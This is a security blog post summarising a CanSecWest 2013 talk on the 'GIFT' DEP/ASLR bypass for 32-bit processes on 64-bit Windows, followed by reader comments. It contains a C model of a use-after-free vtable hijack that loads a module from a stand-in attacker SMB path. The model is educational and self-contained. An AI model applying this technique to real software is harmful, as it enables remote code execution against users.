Fb1h2s aka Rahul Sasi's Blog

DEP/ASLR bypass without ROP/JIT: CanSecWest 2013 Slides and Analysis

I have my own talk from CanSecWest to blog about, but this one is more interesting and the most awaited one. So here are the slides; I will add my own analysis and test cases to this blog entry later. The interesting thing is that we had this technique discussed on Garage in November.

Yu Yang (@tombkeeper) demoed the technique on MS13-008, and his ASLR/DEP bypass did not need a heap spray.

And the exploit is scary: a quick kaboom, with no heap spray.
He calls this method GIFT (Got It From a Table).
In short, the trick is to point the VFT (virtual function table) pointer at Wow64SharedInformation and the pointers it holds.

Here are a couple of quick notes on the bypass technique:

Good news about the technique:

  • Totally ASLR/DEP free: neither mitigation gets in the way
  • Language- and service-pack-independent
  • Works on almost all use-after-free / vtable-overflow bugs
  • Targets IE, Firefox, PDF readers, Flash, Office …
  • Doesn't even need shellcode
  • Sometimes doesn't need a heap spray

Bad news about the technique:

  • Needs a Windows file-sharing (SMB) server
      • but that is not a real problem
  • Only works on 32-bit processes on x64 Windows
      • but this situation is very common
  • Cannot work on Windows 8
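The primitive behind the "works on almost all use-after-free / vtable-overflow bugs" and "doesn't even need shellcode" points, as an added C model that is not code from the slides or from tombkeeper: the chunk that held a freed object is refilled with attacker bytes, its vtable pointer now points at a table of function pointers that already exists in the process at an address the attacker knows, and the next virtual call therefore runs existing code with attacker-chosen data rather than injected shellcode. `known_table` and `loader_routine` are hypothetical stand-ins for the fixed-address table and the library-loading routine the real technique borrows; the UNC path plays the role of the module served from the attacker's file share. This is the generic primitive only, not the Wow64SharedInformation specifics from the talk.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Model of a C++ object: the first word is the virtual function table pointer. */
typedef struct Object Object;
typedef int (*Method)(Object *self);
struct Object {
    const Method *vft;      /* pointer to a table of function pointers */
    char          path[64]; /* attacker-controlled data in the reused chunk */
};

static char g_loaded[64];   /* records what the "loader" was asked to load */

/* The object's real virtual method. */
static int legit_method(Object *self) { (void)self; return 0; }

/* Hypothetical stand-in for an existing, already-mapped library routine that
   loads a module from a path (LoadLibrary-like). It is ordinary process code,
   not injected shellcode; in the real technique the module would be fetched
   from a UNC path on the attacker's SMB share. */
static int loader_routine(Object *self) {
    strncpy(g_loaded, self->path, sizeof g_loaded - 1);
    g_loaded[sizeof g_loaded - 1] = '\0';
    return 1;
}

/* Hypothetical table of function pointers at an address the attacker knows.
   In the talk this is a table present in every WoW64 process; here it is
   just a static array whose slot 0 happens to be the loader. */
static const Method known_table[]  = { loader_routine, legit_method };
static const Method legit_vtable[] = { legit_method };

/* The victim's virtual call site: dispatch through slot 0 of the vtable. */
static int virtual_call(Object *obj) { return obj->vft[0](obj); }

/* Simulates the use-after-free: the chunk that held the object is reused for
   attacker data, which overwrites the vtable pointer with the address of the
   known table and the rest of the chunk with a UNC path. Returns the path the
   loader was asked to load, or NULL if the hijack did not take effect. */
const char *simulate_vtable_hijack(const char *unc_path) {
    Object *obj = calloc(1, sizeof *obj);
    if (!obj) return NULL;
    obj->vft = legit_vtable;
    virtual_call(obj);                 /* normal use: legit_method runs */

    /* "Free" and "reallocate": the same chunk is refilled with attacker bytes. */
    unsigned char *chunk = (unsigned char *)obj;
    const Method *fake = known_table;
    memcpy(chunk, &fake, sizeof fake); /* clobber the vft pointer */
    strncpy(obj->path, unc_path, sizeof obj->path - 1);

    g_loaded[0] = '\0';
    virtual_call(obj);                 /* dangling use: lands in loader_routine */
    free(obj);
    return g_loaded[0] ? g_loaded : NULL;
}

int main(void) {
    const char *p = simulate_vtable_hijack("\\\\attacker\\share\\evil.dll");
    printf("loader asked for: %s\n", p ? p : "(nothing)");
    return 0;
}
```

The point the model makes is that nothing new is executed: the only attacker-supplied bytes are a pointer to code that is already there and a string, which is why DEP has nothing to block and why the only address that must be known is that of the table.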

The documents and presentation are from Yu Yang (@tombkeeper).
Download the slides from here:

  1. 41.w4r10r:
    A few months back we discussed something similar here.
  2. webdevil:
    Vinnu discussed this a while ago on the forum. Go Vinnu go!

    And Thanks for the slides!
    Updated 03-08-2013 at 10:59 AM by webdevil
  3. cons0ul:
  4. fb1h2s:
    Well, while attending the talk I was wondering how I knew the talk even before, and I was like, it might be another déjà vu.


